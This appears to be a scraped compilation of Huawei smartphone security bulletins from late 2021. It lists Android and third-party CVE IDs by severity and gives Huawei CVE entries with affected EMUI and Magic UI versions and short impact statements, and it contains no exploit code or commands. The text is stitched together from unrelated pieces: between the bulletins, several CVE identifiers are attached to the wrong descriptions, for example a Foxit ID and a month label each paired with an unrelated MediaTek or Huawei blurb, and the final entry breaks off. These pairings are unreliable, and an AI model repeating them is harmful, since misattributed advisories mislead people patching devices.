There is an Integer overflow vulnerability with ACPU in smartphones. Successful exploitation of this vulnerability may cause out-of-bounds access.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the November 2021 Android security bulletin:

Critical: CVE-2021-0802, CVE-2021-0930

High: CVE-2021-0845, CVE-2021-0748, CVE-2021-0862, CVE-2020-13871, CVE-2021-0650, CVE-2021-0653, CVE-2021-0926, CVE-2021-0928, CVE-2021-0931, CVE-2021-0932, CVE-2021-0933, CVE-2021-0920, CVE-2021-1048, CVE-2021-0927

Medium: CVE-2021-0839, CVE-2021-0848, CVE-2021-0758, CVE-2021-0773, CVE-2021-0787, CVE-2021-0793, CVE-2021-0814, CVE-2021-0767, CVE-2021-0853, CVE-2021-0831, CVE-2021-0790, CVE-2021-0786, CVE-2021-0783, CVE-2021-0771, CVE-2021-0719, CVE-2021-0729, CVE-2021-0733, CVE-2021-0741, CVE-2021-0751, CVE-2021-0754, CVE-2021-0760, CVE-2021-0740, CVE-2021-0812, CVE-2021-0818, CVE-2021-0842, CVE-2021-0829, CVE-2021-0809, CVE-2021-0810, CVE-2021-0811, CVE-2021-0776, CVE-2021-0817, CVE-2021-0819, CVE-2021-0919, CVE-2021-30265, CVE-2021-30263, CVE-2018-25015

Low: none

Already included in previous updates: CVE-2021-0938

※For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the CVE of other third-party library patches:

High: CVE-2021-40490, CVE-2013-0894, CVE-2021-32399, CVE-2020-22025, CVE-2020-22037, CVE-2020-22026, CVE-2020-17541

Medium: CVE-2021-3753, CVE-2020-10135, CVE-2021-3635, CVE-2021-3566, CVE-2020-22056, CVE-2020-22043, CVE-2020-22039, CVE-2020-22028, CVE-2020-22044, CVE-2020-22020, CVE-2020-22051, CVE-2020-22049, CVE-2020-22040, CVE-2020-22019, CVE-2020-22038, CVE-2020-22046, CVE-2019-17539

This security update includes the following HUAWEI patches:

CVE-2021-37118: Man-in-the-middle (MITM) attack vulnerability when using HUAWEI Share in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 9.1.0, EMUI 9.1.1, EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, Magic UI 2.1.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-39993: Integer overflow vulnerability with ACPU

Severity: Medium

Affected versions: EMUI 11.0.0, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause out-of-bounds access.

CVE-2021-39974: Out-of-bounds read in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 11.0.0, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37133: Unauthorized file access vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37125: Input verification absence in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 11.0.0, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-39996: Heap-based buffer overflow vulnerability with the NFC module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause memory overflow.

CVE-2021-37112: Incomplete device version verification vulnerability due to the integrity protection defects of the PC version of HiSuite in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.0.0, Magic UI 9.1.1

Impact: Successful exploitation of this vulnerability may affect service integrity.

CVE-2021-37096: Input verification vulnerability in some HUAWEI devices

Severity: High

Affected versions: EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37074: Race condition vulnerability in some HUAWEI phones

Severity: High

Affected versions: EMUI 10.1.1, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37069: Race condition vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.1, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-39998: Vulnerability of APIs being concurrently called for multiple times in HwConnectivityExService

Severity: Medium

Affected versions: EMUI 11.0.0, EMUI 11.0.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause the system to crash and restart.

CVE-2021-37043: Vulnerability of not performing strong foreground authentication on the caller in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 9.1.0, EMUI 9.1.1, EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, Magic UI 2.1.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause malicious application processes to keep alive, which occupies system resources and affects system availability.

CVE-2021-39993: December

In Bluetooth, there is a possible application crash due to bluetooth flooding a device with LMP_AU_rand packet. This could lead to remote denial of service of bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06198608; Issue ID: ALPS06198608.

CVE-2022-20023: January 2022

Foxit PDF Reader and PDF Editor before 11.1 on macOS allow remote attackers to execute arbitrary code via getURL in the JavaScript API.

CVE-2021-45980: Security Bulletins | Foxit Software

There is an Out-of-bounds read in Smartphones.Successful exploitation of this vulnerability may affect service confidentiality.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the October 2021 Android security bulletin.

Critical: CVE-2021-0870, CVE-2020-11264

High: CVE-2020-15358, CVE-2021-0483, CVE-2021-0652, CVE-2021-0706, CVE-2021-0708, CVE-2021-0651, CVE-2021-0705, CVE-2021-0643, CVE-2021-0702, CVE-2021-0703, CVE-2021-30306, CVE-2021-30305, CVE-2021-27666, CVE-2021-29647, CVE-2020-29660, CVE-2021-1977, CVE-2020-24588, CVE-2021-1980, CVE-2020-24587, CVE-2020-26141, CVE-2020-26145, CVE-2020-26146

Medium: CVE-2021-0941, CVE-2021-31916, CVE-2021-1966, CVE-2021-0936, CVE-2021-1969, CVE-2021-0935, CVE-2021-1967, CVE-2019-25045, CVE-2021-0937

Low: none

Already included in previous updates: CVE-2021-0691, CVE-2021-1891, CVE-2021-1927, CVE-2020-27786, CVE-2020-29661, CVE-2020-25656, CVE-2020-27825

※For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the CVE of other third-party library patches:

High: CVE-2021-32399, CVE-2020-17541

Medium: CVE-2020-14314, CVE-2019-20934, CVE-2020-25641, CVE-2020-35508, CVE-2020-12352, CVE-2020-24490, CVE-2021-3564, CVE-2021-0129

This security update includes the following HUAWEI patches:

CVE-2021-37118: Man-in-the-middle (MITM) attack vulnerability when using HUAWEI Share in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 9.1.0, EMUI 9.1.1, Magic UI 2.1.1, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-36988: Input verification vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 9.1.0, Magic UI 3.0.0, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may result in code execution.

CVE-2021-39969: Unauthorized file access vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-39967: Vulnerability of obtaining broadcast information improperly due to improper broadcast permission settings in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-39966: Uninitialized AOD driver structure in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 11.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37133: Unauthorized file access vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 9.1.0, EMUI 9.1.1, Magic UI 2.1.1, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37126: Unstrict URI verification vulnerability in some HUAWEI devices

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.1, EMUI 9.1.1, Magic UI 2.1.1, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may cause directory traversal attacks and affect confidentiality.

CVE-2021-37125: Input verification absence in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-39973: Null pointer dereference in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 11.0.0, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause the kernel to break down.

CVE-2021-37112: Incomplete device version verification vulnerability due to the integrity protection defects of the PC version of HiSuite in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect service integrity.

CVE-2021-37110: Timing design defects in some HUAWEI devices

Severity: High

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37096: Input verification vulnerability in some HUAWEI devices

Severity: High

Affected versions: EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37074: Race condition vulnerability in some HUAWEI phones

Severity: High

Affected versions: EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37069: Race condition vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37039: Input verification vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 11.0.0, Magic UI 3.1.0, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause Bluetooth DoS.

CVE-2021-39974: Out-of-bounds read in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-39978: Security verification absence in some HUAWEI devices

Severity: High

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-22481: Verification errors in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.0.0, EMUI 11.0.1, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-39974: November

There is a Memory leakage vulnerability in Smartphone.Successful exploitation of this vulnerability may cause memory exhaustion.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the September 2021 Android security bulletin.

Critical: CVE-2021-0687

High: CVE-2021-0644, CVE-2021-0682, CVE-2021-0683, CVE-2021-0684, CVE-2021-0598, CVE-2021-0688, CVE-2021-0689, CVE-2021-0690, CVE-2021-0595, CVE-2021-0685, CVE-2021-0693, CVE-2021-0686, CVE-2021-0695, CVE-2021-0680, CVE-2021-0681, CVE-2021-30290, CVE-2021-30294, CVE-2021-1941, CVE-2021-1948, CVE-2021-1974

Medium: CVE-2021-1957, CVE-2021-1958, CVE-2021-1961

Low: none

Already included in previous updates: CVE-2021-0519, CVE-2021-0573, CVE-2021-0574, CVE-2021-0576, CVE-2021-0515, CVE-2021-0514, CVE-2021-0513, CVE-2021-0571, CVE-2021-0592, CVE-2021-0577, CVE-2021-0639, CVE-2020-14381, CVE-2021-3347, CVE-2021-28375, CVE-2021-0585

※For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2021-37020: Improper verification vulnerability in some HUAWEI devices

Severity: High

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may cause out-of-bounds read.

CVE-2021-22326: Kernel space read/write vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37118: Man-in-the-middle (MITM) attack vulnerability when using HUAWEI Share in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.1, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37117: Service logic vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may cause WLAN DoS.

CVE-2021-37114: Out-of-bounds read vulnerability in some HUAWEI devices

Severity: Low

Affected versions: EMUI 11.0.1, EMUI 10.1.1, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37113: Privilege escalation vulnerability with the file system component in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37111: Memory leakage vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 10.1.1, EMUI 10.1.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause memory exhaustion.

CVE-2021-37103: Improper permission management vulnerability in the HUAWEI Wallet app

Severity: Medium

Affected versions: EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37097: OOM vulnerability with the system framework code in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may cause an OOM issue.

CVE-2021-37093: Improper access control vulnerability in some HUAWEI devices

Severity: High

Affected versions: EMUI 11.0.0, EMUI 10.1.1, Magic UI 4.0.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37092: Memory leakage vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may cause the device to restart due to memory exhaustion.

CVE-2021-37075: Credential management vulnerability in some HUAWEI devices

Severity: High

Affected versions: EMUI 10.1.0, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37056: Improper permission control vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may allow attempts to obtain certain device information.

CVE-2021-37054: Identity spoofing and authentication bypass vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37053: Service logic vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may cause WLAN DoS.

CVE-2021-37052: Exception log vulnerability in some HUAWEI phones

Severity: High

Affected versions: EMUI 11.0.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may cause address information leakage.

CVE-2021-37051: Out-of-bounds read vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may cause out-of-bounds memory access.

CVE-2021-37050: Missing sensitive data encryption vulnerability in some HUAWEI phones

Severity: High

Affected versions: EMUI 11.0.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37049: Heap-based buffer overflow vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may rewrite the memory of adjacent objects.

CVE-2021-37047: Input verification vulnerability in some HUAWEI phones

Severity: Low

Affected versions: EMUI 10.1.0, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause some services to restart.

CVE-2021-37045: UAF vulnerability in some HUAWEI phones

Severity: High

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, Magic UI 4.0.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may cause the device to restart unexpectedly and the kernel-mode code to be executed.

CVE-2021-37044: Permission control vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2021-37042: Improper verification vulnerability in some HUAWEI devices

Severity: Low

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause out-of-bounds read.

CVE-2021-37041: Improper verification vulnerability in some HUAWEI devices

Severity: Low

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause out-of-bounds read.

CVE-2021-37040: Parameter injection vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may cause privilege escalation of files after CIFS share mounting.

CVE-2021-37038: Improper access control vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-37021: Improper verification vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause out-of-bounds read.

CVE-2021-37119: Service logic vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may cause WLAN DoS.

CVE-2021-37014: Integer overflow vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect the normal use of the device.

CVE-2021-37013: Permission control vulnerability with the setHdbKey API in HwPackageManagerServiceEx in some EMUI devices

Severity: Low

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2021-37011: Improper verification vulnerability in some HUAWEI devices

Severity: High

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause out-of-bounds read.

CVE-2021-36999: Buffer overflow vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability by sending malicious images and inducing users to open the images may cause remote code execution.

CVE-2021-36997: Low memory error in some HUAWEI devices due to the unlimited size of images to be parsed

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may cause the Gallery or Files app to exit unexpectedly.

CVE-2021-36995: Unauthorized file access vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability by modifying soft links may tamper with the files restored from backups.

CVE-2021-36994: Trustlist strings being repeatedly inserted into the linked list in some HUAWEI devices due to race conditions

Severity: Low

Affected versions: EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0 Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability can cause exceptions when managing the system trustlist.

CVE-2021-36991: Unauthorized file access vulnerability in some HUAWEI devices due to unstandardized path input

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability by creating malicious file paths can cause unauthorized file access.

CVE-2021-36990: Vulnerability of tampering with the kernel in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may escalate permissions.

CVE-2021-36989: Kernel crash vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may escalate permissions.

CVE-2021-36986: Vulnerability of tampering with the kernel in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may escalate permissions.

CVE-2021-36985: Code injection vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may exhaust system resources and cause the system to restart.

CVE-2021-3506: Out-of-bounds operation vulnerability after rooting in some HUAWEI phones

Severity: High

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may affect service stability and integrity.

CVE-2021-22491: Input verification vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2021-22489: DoS vulnerability in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2021-22488: Unauthorized file access vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability by modifying soft links may tamper with the files restored from backups.

CVE-2021-22485: SSID vulnerability with Wi-Fi network connections in HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-22481: Verification errors in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-22475: Improper permission management vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-22469: Out-of-bounds memory read vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause the kernel to crash.

CVE-2021-22460: Boot restriction bypass vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-22455: Integer overflow vulnerability with the Always On Display (AOD) driver in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may escalate the permission to that of the root user.

CVE-2021-22420: Vulnerability of forging package names by implementing the getBasePackageName method in some HUAWEI devices

Severity: High

Affected versions: EMUI 9.1.1, EMUI 9.1.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect the normal use of system apps.

CVE-2021-22374: Out-of-bounds array access in the kernel of some HUAWEI phones

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may cause stability risks.

CVE-2021-22370: Improper verification vulnerability in some HUAWEI phones

Severity: High

Affected versions: EMUI 10.1.0, EMUI 10.0.0, EMUI 9.1.1, EMUI 9.1.0, Magic UI 3.1.0, Magic UI 3.0.0, Magic UI 2.1.1

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2021-22345: Improper verification vulnerability in some HUAWEI phones

Severity: Medium

